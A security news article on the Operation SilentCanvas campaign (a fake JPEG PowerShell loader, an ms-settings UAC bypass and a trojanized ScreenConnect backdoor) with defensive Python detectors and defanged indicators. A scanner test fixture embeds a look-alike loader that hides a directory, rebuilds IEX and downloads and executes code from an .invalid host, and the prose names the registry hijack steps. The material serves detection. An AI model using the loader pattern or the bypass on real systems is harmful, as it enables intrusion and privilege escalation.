Operation SilentCanvas: Hackers Hide PowerShell Malware in Fake JPEG to Deploy Trojanized ScreenConnect Backdoor

dark6 12 May 2026

Security researchers at Cyfirma have uncovered a sophisticated new attack campaign dubbed Operation SilentCanvas that distributes malware disguised as a routine JPEG image file. Targeting Windows systems, the campaign chains together multiple advanced evasion techniques — including a UAC bypass, fileless execution, and a trojanized version of the legitimate ConnectWise ScreenConnect remote access tool — to give attackers deep, persistent, and largely invisible control of infected machines.

The Trojan Image: sysupdate.jpeg

The attack begins when a victim receives a file called sysupdate.jpeg — delivered through a phishing email, a fake software update prompt, or a deceptive file-sharing link. Despite its .jpeg extension, the file contains no image data whatsoever. It holds a PowerShell script engineered to quietly set up a staging environment and pull down additional malicious components from attacker-controlled servers.

The .jpeg extension keeps the file from being treated as a script by extension-based filters and by anyone glancing at it, but it does not make Windows execute it: double-clicking the file opens an image viewer that fails to render anything. The script runs only once the lure gets its contents fed to powershell.exe. When that happens, the embedded code creates a hidden folder at C:\Systems and downloads a trojanized ScreenConnect package from the attacker's infrastructure over TCP port 5443.

To evade antivirus detection, the loader reconstructs its command strings at runtime rather than embedding them in plaintext, so the literals a static scanner keys on never appear in the file. A secondary payload named access.jpeg is downloaded and executed directly in memory, so that stage never lands on disk as an executable. Microsoft's own .NET compiler, csc.exe, then builds a custom launcher named uds.exe on the victim machine. That binary does touch disk, but because it is compiled per victim its hash differs on every host, which defeats hash- and signature-based detection tuned to a precompiled launcher; the compilation itself (powershell.exe spawning csc.exe, which in turn spawns cvtres.exe) is the more reliable thing to watch for.
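A first check a responder can run over a mail quarantine or a download directory is whether each file's bytes match its extension and, if not, whether the content looks like a PowerShell loader. The following Python is an added example for this article, not Cyfirma's tooling or anything recovered from the campaign. It generalises the sysupdate.jpeg case to the PNG and GIF extensions and to polyglots (a real image with a script appended after the image data), and the sample files it writes are constructed look-alikes: the loader text only mimics the traits described above and points at a reserved .invalid hostname.

```python
"""Find files that carry an image extension but not image content, and score
them for PowerShell loader traits.  Added example for this article, not
Cyfirma's tooling; the files written by make_samples() are constructed (the
loader text is a harmless look-alike that points at an .invalid hostname)."""
import re
import tempfile
from pathlib import Path

# File signatures for the extensions a lure like sysupdate.jpeg relies on.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",), ".gif": (b"GIF87a", b"GIF89a"),
}

# Loader traits.  The three *-rebuild patterns target runtime string
# reconstruction, which is exactly what keeps a literal "IEX" or
# "DownloadString" out of the file; matching only on literals would miss it.
TRAITS = [
    ("invoke", re.compile(rb"Invoke-Expression|\bIEX\b", re.I)),
    ("download", re.compile(rb"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest", re.I)),
    ("hidden-dir", re.compile(rb"New-Item\b[^\r\n]*-ItemType\s+Directory|attrib\s+\+h", re.I)),
    ("hidden-window", re.compile(rb"-w(?:indowstyle)?\s+hidden", re.I)),
    ("char-rebuild", re.compile(rb"\[char\]\s*\d+\s*\+\s*\[char\]", re.I)),
    ("join-rebuild", re.compile(rb"-join\s*[\(\$]", re.I)),
    ("concat-rebuild", re.compile(rb"'[^']{1,8}'\s*\+\s*'[^']{1,8}'\s*\+", re.I)),
    ("base64", re.compile(rb"FromBase64String|-EncodedCommand|\s-e(?:nc)?\s", re.I)),
]


def inspect_file(path: Path) -> dict:
    """Classify one file by (extension vs. magic) and (loader traits present)."""
    data = path.read_bytes()
    expected = MAGIC.get(path.suffix.lower())
    magic_ok = expected is None or data.startswith(expected)
    head = data[:4096]
    text_ratio = sum(32 <= b < 127 or b in (9, 10, 13) for b in head) / max(len(head), 1)
    traits = [name for name, rx in TRAITS if rx.search(data)]
    if not magic_ok and (traits or text_ratio > 0.9):
        verdict = "script-as-image"      # the sysupdate.jpeg case: text, no image data
    elif not magic_ok:
        verdict = "extension-mismatch"   # wrong extension but binary content; triage, not alarm
    elif len(traits) >= 2:
        verdict = "polyglot"             # valid image header with a script appended
    else:
        verdict = "clean"
    return {"name": path.name, "magic_ok": magic_ok, "text_ratio": round(text_ratio, 2),
            "traits": traits, "verdict": verdict}


def scan(root: Path) -> list:
    """Inspect every file under root whose extension claims to be an image."""
    return [inspect_file(p) for p in sorted(root.rglob("*"))
            if p.is_file() and p.suffix.lower() in MAGIC]


# Constructed look-alike of the loader described above: hidden staging
# directory, "IEX" rebuilt from [char] values, URL built by concatenation.
LOADER = b"""\
$d = 'C:\\Systems'
New-Item -ItemType Directory -Path $d -Force | Out-Null
attrib +h $d
$x = [char]73+[char]69+[char]88
$u = 'http://' + 'example' + '.invalid' + ':5443/access.jpeg'
& $x ((New-Object Net.WebClient).DownloadString($u))
"""

JPEG_BODY = b"\xff\xd8\xff\xe0" + bytes(range(256)) * 8   # header plus binary filler


def make_samples(root: Path) -> Path:
    """Write four constructed test files and return the directory."""
    (root / "sysupdate.jpeg").write_bytes(LOADER)                     # script with image extension
    (root / "photo.jpeg").write_bytes(JPEG_BODY)                       # genuine-looking image
    (root / "poly.jpg").write_bytes(JPEG_BODY + LOADER)                # image with script appended
    (root / "renamed.jpeg").write_bytes(b"\x89PNG\r\n\x1a\n" + bytes(256))  # PNG mislabelled .jpeg
    return root


def demo() -> dict:
    """Scan a fresh temp directory of samples; returns findings keyed by file name."""
    return {r["name"]: r for r in scan(make_samples(Path(tempfile.mkdtemp())))}


if __name__ == "__main__":
    for name, finding in demo().items():
        print(f"{name:16} {finding['verdict']:18} traits={finding['traits']}")
```

Point scan() at a real directory to use it; the four verdicts are deliberately separate so that a renamed PNG is triaged rather than paged on, while a text file with an image extension and any loader trait is. Note that the constructed loader never contains the literal "IEX", so the "invoke" trait does not fire on it; the char-rebuild and concat-rebuild traits are what carry the detection.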

Silent Privilege Escalation via UAC Bypass

After the launcher is compiled, the malware performs a UAC bypass with no visible prompt. It writes a registry value under the current user's ms-settings protocol handler (in the well-documented form of this technique, HKCU\Software\Classes\ms-settings\Shell\Open\command) so that the handler's command points at uds.exe, then starts ComputerDefaults.exe, a Microsoft-signed binary that Windows auto-elevates. When the elevated process resolves the ms-settings handler it launches uds.exe with full administrator rights. The hijacked key is deleted within about two seconds, so a scan of the registry after the fact finds nothing; only telemetry that records registry writes as they happen (Sysmon registry events, or an EDR with equivalent coverage) preserves the evidence.

This technique requires no exploit, no vulnerability, and no user interaction beyond getting the loader to run in the first place. It abuses entirely legitimate Windows mechanisms, which makes it hard to catch with conventional means. It does have one precondition: auto-elevation only works for a user who is already a member of the local Administrators group and running at the default UAC level (the "Always notify" setting prompts even for auto-elevating binaries). On a standard-user account there is nothing to elevate, which is one more reason not to give day-to-day accounts local admin rights.
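Because the hijacked key lives for only about two seconds, detection has to work on the stream of registry and process events rather than on the registry's current state. The following Python is an added example for this article, not Cyfirma's detection content. It assumes Sysmon-style records (event 13 for the value write, event 1 for process creation, event 12 for the key deletion) and runs over constructed events with a made-up user SID, including two benign ones to show that a user opening Default Apps from the shell does not trigger it; the ten-second correlation window is a chosen parameter, not a figure from the report.

```python
"""Correlate Sysmon-style telemetry to catch the ms-settings / ComputerDefaults.exe
UAC bypass described above, including the key deletion that defeats a
point-in-time registry scan.  Added example for this article, not Cyfirma's
detection content; the events below are constructed to mirror the chain the
article describes (Sysmon field names, a made-up user SID) and are not real
telemetry."""
import re

# Sysmon event IDs: 1 = process create, 12 = registry key create/delete,
# 13 = registry value set.
HIJACK_KEY = re.compile(r"\\Software\\Classes\\ms-settings\\Shell\\Open\\command", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
WINDOW_S = 10.0   # hijack -> elevated launch -> cleanup completes well inside this

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CD = r"C:\Windows\System32\ComputerDefaults.exe"
HIVE = r"HKU\S-1-5-21-1111-2222-3333-1001"   # constructed SID for the logged-in user

EVENTS = [   # constructed; "t" is seconds
    # 1. the loader points the protocol handler's command at the launcher
    {"t": 100.0, "id": 13, "Image": PS,
     "TargetObject": HIVE + r"\Software\Classes\ms-settings\Shell\Open\command\(Default)",
     "Details": r"C:\Systems\uds.exe"},
    # 2. the auto-elevating binary is started from the script host
    {"t": 100.4, "id": 1, "Image": CD, "ParentImage": PS, "IntegrityLevel": "High"},
    # 3. the handler fires: the launcher runs as a High-integrity child
    {"t": 100.6, "id": 1, "Image": r"C:\Systems\uds.exe", "ParentImage": CD,
     "IntegrityLevel": "High"},
    # 4. cleanup about two seconds later removes the hijacked key
    {"t": 102.1, "id": 12, "EventType": "DeleteKey", "Image": PS,
     "TargetObject": HIVE + r"\Software\Classes\ms-settings"},
    # benign noise: a user opening Default Apps from the shell, and an
    # unrelated per-user file association being set
    {"t": 250.0, "id": 1, "Image": CD, "ParentImage": r"C:\Windows\explorer.exe",
     "IntegrityLevel": "High"},
    {"t": 260.0, "id": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": HIVE + r"\Software\Classes\.log\(Default)", "Details": "txtfile"},
]


def base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list) -> list:
    """One alert per hijack write, graded by how much of the chain follows it,
    plus a weaker alert for ComputerDefaults.exe launched by a script host with
    no registry event (covers hosts where registry telemetry is missing)."""
    events = sorted(events, key=lambda e: e["t"])
    alerts, claimed = [], set()
    for h in (e for e in events if e["id"] == 13 and HIJACK_KEY.search(e["TargetObject"])):
        stages = {"hijack"}
        payload = h["Details"].strip('"').lower()
        for e in events:
            if not h["t"] <= e["t"] <= h["t"] + WINDOW_S:
                continue
            if e["id"] == 1 and base(e["Image"]) == "computerdefaults.exe":
                stages.add("auto-elevate")
                claimed.add(id(e))
            elif (e["id"] == 1 and base(e["ParentImage"]) == "computerdefaults.exe"
                  and e["Image"].lower() == payload and e["IntegrityLevel"] == "High"):
                stages.add("elevated-payload")
            elif (e["id"] == 12 and e.get("EventType") == "DeleteKey"
                  and "ms-settings" in e["TargetObject"].lower()):
                stages.add("key-deleted")   # anti-forensics: a later scan finds nothing
        core = len(stages & {"hijack", "auto-elevate", "elevated-payload"})
        alerts.append({"t": h["t"], "severity": {1: "medium", 2: "high"}.get(core, "critical"),
                       "writer": base(h["Image"]), "payload": payload, "stages": sorted(stages)})
    for e in events:
        if (e["id"] == 1 and base(e["Image"]) == "computerdefaults.exe"
                and base(e["ParentImage"]) in SCRIPT_HOSTS and id(e) not in claimed):
            alerts.append({"t": e["t"], "severity": "medium", "writer": base(e["ParentImage"]),
                           "payload": None, "stages": ["auto-elevate-from-script-host"]})
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a)
```

The write to the ms-settings command value is the anchor; everything else only raises the grade. That ordering matters because the write is the one event an attacker cannot avoid producing, whereas a ComputerDefaults.exe launch on its own is also what a user clicking Default Apps generates. Feeding the same function only the process events (no registry telemetry) still yields a medium alert for the script-host launch, which is the fallback you want on hosts where Sysmon's registry rules are not enabled.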

Deep Post-Compromise Capabilities

Once the trojanized ScreenConnect framework is active, attackers gain comprehensive control of the infected machine. The modified software supports:

  • Real-time screen monitoring and video recording
  • Microphone capture and keystroke logging
  • Clipboard interception and silent file transfers through an encrypted channel
  • A hidden desktop environment operating outside the logged-in user’s view
  • Credential interception at the Windows login screen before credentials reach the authentication system
  • Creation of hidden local administrator accounts for long-term persistent access

A Windows service named OneDriveServers keeps the malware alive across reboots; the name mimics Microsoft's own service naming so that it blends into the service and process lists.

AMSI and Antivirus Evasion

The infection chain incorporates multiple layers of antimalware evasion. The PowerShell loader uses runtime string reconstruction to avoid static detection, in-memory execution to avoid disk-based scanning, and on-host compilation via csc.exe to produce a uniquely fingerprinted binary for each victim. The Antimalware Scan Interface (AMSI) is bypassed during the PowerShell execution phase, so Windows Defender and other AMSI providers never get to inspect the script content. AMSI and PowerShell's own Script Block Logging are separate mechanisms, though: unless the loader also disables logging, event 4104 in the Microsoft-Windows-PowerShell/Operational log still records the script blocks as they execute, after de-obfuscation, which is usually the quickest way to recover what actually ran.

Indicators of Compromise

Organizations should immediately block or monitor the following indicators identified by Cyfirma:

  • C2 IP: 45[.]138[.]16[.]64 (defanged)
  • C2 Domain: legitserver[.]theworkpc[.]com (defanged)
  • Malicious file names: sysupdate.jpeg, access.jpeg, uds.exe
  • Staging directory: C:\Systems
  • Malware persistence path: C:\ProgramData\OneDriveServer\
  • Suspicious service name: OneDriveServers

Recommended Defensive Actions

Security teams should take the following steps to detect and respond to Operation SilentCanvas:

  • Block or closely monitor csc.exe and cvtres.exe when their parent is powershell.exe or another script host rather than a build tool, and ComputerDefaults.exe when its parent is powershell.exe, cmd.exe or another script host
  • Deploy detection rules for PowerShell downloading executables and writing to hidden directories outside standard application paths
  • Alert on ScreenConnect (ConnectWise Control) client installs running from non-standard directories, particularly C:\ProgramData\OneDriveServer\
  • Monitor for new Windows services with names mimicking Microsoft products (e.g., OneDriveServers)
  • Enforce application allowlisting to prevent unauthorized use of csc.exe as an on-host compiler
  • Perform credential resets for all privileged accounts on any system suspected of exposure
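The list above reads as rules, so the following Python turns the first four items plus the IoC list into checks over sample telemetry. It is an added example for this article, not Cyfirma's rules: the records are constructed to resemble Sysmon process and network events and System log 7045 service installs; the ScreenConnect client's default install root (C:\Program Files (x86)\ScreenConnect Client (...)) and the name of the binary placed under C:\ProgramData\OneDriveServer\ are assumptions, not details from the report; and the IoCs are matched after refanging the defanged forms listed above.

```python
"""Rule set for the defensive actions listed above: on-host compilation driven by
a script host, a ScreenConnect client running from a non-standard directory, a
Microsoft-sounding service installed outside the system directories, and
outbound traffic to the published indicators.  Added example for this article,
not Cyfirma's rules.  The records are constructed to look like Sysmon process
(1) and network (3) events and System log 7045 service installs; the
ScreenConnect install root and the OneDriveServer service binary name are
assumptions, not details taken from the article."""
import re

# Indicators exactly as published (defanged); refang before matching.
IOCS_DEFANGED = ["45[.]138[.]16[.]64", "legitserver[.]theworkpc[.]com"]


def refang(s: str) -> str:
    """Turn a defanged indicator back into a matchable value."""
    return re.sub(r"hxxp", "http", s.replace("[.]", "."), flags=re.I)


IOCS = {refang(x).lower() for x in IOCS_DEFANGED}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Assumed default install root of the ScreenConnect client (lower-cased prefix).
SCREENCONNECT_OK = "c:\\program files (x86)\\screenconnect client ("
SYSTEM_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
MS_LOOKALIKE = re.compile(r"onedrive|microsoft|windows|defender|edge|office", re.I)

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
CSC = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe"
CVTRES = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe"
SVC = "C:\\Windows\\System32\\services.exe"
SC_BAD = "C:\\ProgramData\\OneDriveServer\\ScreenConnect.ClientService.exe"   # assumed binary name
SC_OK = "C:\\Program Files (x86)\\ScreenConnect Client (0123456789abcdef)\\ScreenConnect.ClientService.exe"

EVENTS = [   # constructed, in time order
    # malicious: PowerShell -> csc.exe -> cvtres.exe building the launcher
    {"kind": "process", "pid": 4120, "ppid": 3988, "Image": CSC, "ParentImage": PS,
     "CommandLine": "csc.exe /nologo /out:C:\\Systems\\uds.exe C:\\Systems\\a.cs"},
    {"kind": "process", "pid": 4130, "ppid": 4120, "Image": CVTRES, "ParentImage": CSC,
     "CommandLine": "cvtres.exe /NOLOGO /READONLY /MACHINE:x64"},
    # benign: the same two binaries under a real build tool
    {"kind": "process", "pid": 5000, "ppid": 4990, "Image": CSC,
     "ParentImage": "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe",
     "CommandLine": "csc.exe /noconfig @obj\\Debug\\App.csproj.rsp"},
    {"kind": "process", "pid": 5010, "ppid": 5000, "Image": CVTRES, "ParentImage": CSC,
     "CommandLine": "cvtres.exe /NOLOGO /READONLY /MACHINE:x64"},
    # ScreenConnect client from the persistence path vs. the normal install path
    {"kind": "process", "pid": 6000, "ppid": 800, "Image": SC_BAD, "ParentImage": SVC, "CommandLine": SC_BAD},
    {"kind": "process", "pid": 6100, "ppid": 800, "Image": SC_OK, "ParentImage": SVC, "CommandLine": SC_OK},
    # service installs (System 7045): the lookalike and a genuine Microsoft one
    {"kind": "service", "ServiceName": "OneDriveServers", "ImagePath": "\"" + SC_BAD + "\""},
    {"kind": "service", "ServiceName": "OneDrive Updater Service",
     "ImagePath": "\"C:\\Program Files\\Microsoft OneDrive\\OneDriveUpdaterService.exe\""},
    # network (Sysmon 3): published C2, a script host on 5443 elsewhere, and a browser
    {"kind": "network", "Image": PS, "DestinationIp": "45.138.16.64", "DestinationPort": 5443,
     "DestinationHostname": "legitserver.theworkpc.com"},
    {"kind": "network", "Image": PS, "DestinationIp": "198.51.100.7", "DestinationPort": 5443,
     "DestinationHostname": ""},
    {"kind": "network", "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443, "DestinationHostname": "example.org"},
]


def base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events: list) -> list:
    """Return (rule, detail) pairs.  Process events must arrive parent-first so
    that cvtres.exe can be tied to the script-driven csc.exe by ppid."""
    alerts, compiler_pids = [], set()
    for e in events:
        if e["kind"] == "process":
            img, parent = base(e["Image"]), base(e["ParentImage"])
            if img == "csc.exe" and parent in SCRIPT_HOSTS:
                compiler_pids.add(e["pid"])
                alerts.append(("on-host-compile", f"{parent} -> csc.exe: {e['CommandLine']}"))
            elif img == "cvtres.exe" and e["ppid"] in compiler_pids:
                alerts.append(("on-host-compile", f"cvtres.exe under script-driven csc.exe pid {e['ppid']}"))
            if img.startswith("screenconnect") and not e["Image"].lower().startswith(SCREENCONNECT_OK):
                alerts.append(("rmm-nonstandard-path", e["Image"]))
        elif e["kind"] == "service":
            path = e["ImagePath"].strip('"').lower()
            if MS_LOOKALIKE.search(e["ServiceName"]) and not path.startswith(SYSTEM_ROOTS):
                alerts.append(("lookalike-service", f"{e['ServiceName']} -> {e['ImagePath']}"))
        elif e["kind"] == "network":
            dst = {e["DestinationIp"].lower(), e.get("DestinationHostname", "").lower()}
            if dst & IOCS:
                alerts.append(("c2-indicator", f"{base(e['Image'])} -> {sorted(dst & IOCS)}"))
            elif e["DestinationPort"] == 5443 and base(e["Image"]) in SCRIPT_HOSTS:
                alerts.append(("script-host-5443", f"{base(e['Image'])} -> {e['DestinationIp']}:5443"))
    return alerts


if __name__ == "__main__":
    for rule, detail in evaluate(EVENTS):
        print(f"[{rule}] {detail}")
```

Two design points carry over to a real SIEM rule. The csc.exe rule keys on the parent, not the binary, because csc.exe and cvtres.exe are entirely normal under MSBuild or Visual Studio; tying cvtres.exe back through the parent pid avoids a second noisy rule for it. The lookalike-service rule pairs the name heuristic with the image path, since the real OneDrive Updater Service also matches the name pattern but lives under Program Files, and the port-5443 rule is deliberately a weak signal gated on a script host rather than a standalone alert.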

Operation SilentCanvas demonstrates how attackers are combining multiple living-off-the-land techniques with trojanized legitimate software to create attack chains that are highly resistant to detection at every stage. The use of trusted file extensions, legitimate system binaries, and well-known remote access software makes this campaign particularly challenging for conventional endpoint security to flag.
